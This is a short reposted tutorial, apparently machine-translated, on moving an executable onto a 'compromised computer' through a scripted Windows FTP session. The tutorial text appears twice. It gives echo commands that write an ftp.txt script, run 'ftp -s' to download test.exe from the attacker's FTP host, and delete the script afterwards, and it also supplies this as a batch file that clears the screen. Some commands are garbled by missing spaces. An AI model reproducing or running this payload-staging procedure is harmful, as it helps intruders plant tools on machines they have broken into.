Upload and download via FTP command

Source: Internet
Author: User

How do you use the command to upload files on your computer to the compromised computer? There are many ways. Using FTP is a good choice. Methods are as follows

echo Open your Ftpip >ftp.txt

echo User >>ftp.txt

Echo Password>>ftp.txt

echo Get Test.exe >>ftp.txt

echo Bye >>ftp.txt

Ftp-s:ftp.txt

Delftp.txt

So we can download the test.exe.

You can also do a batch process

@echo off

echo Open your Ftpip >ftp.txt

echo User >>ftp.txt

Echo Password>>ftp.txt

echo Get Test.exe >>ftp.txt

echo Bye >>ftp.txt

Ftp-s:ftp.txt

Delftp.txt

@cls

How do you use the command to upload files on your computer to the compromised computer? There are many ways. Using FTP is a good choice. Methods are as follows

echo Open your Ftpip >ftp.txt

echo User >>ftp.txt

Echo Password>>ftp.txt

echo Get Test.exe >>ftp.txt

echo Bye >>ftp.txt

Ftp-s:ftp.txt

Delftp.txt

So we can download the test.exe.

You can also do a batch process

@echo off

echo Open your Ftpip >ftp.txt

echo User >>ftp.txt

Echo Password>>ftp.txt

echo Get Test.exe >>ftp.txt

echo Bye >>ftp.txt

Ftp-s:ftp.txt

Delftp.txt

@cls

—————————————————————————————— I'm a gorgeous split-line ———————————————————————————

The previous part is reproduced, in fact, the use of the FTP command can read the function of the instruction, the actual Ftp.txt file content is as follows (the Chinese part needs to be replaced):

Open your FTP address

Your user name

Your password.

Bin

Get your file name

Bye

Upload and download via FTP command

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.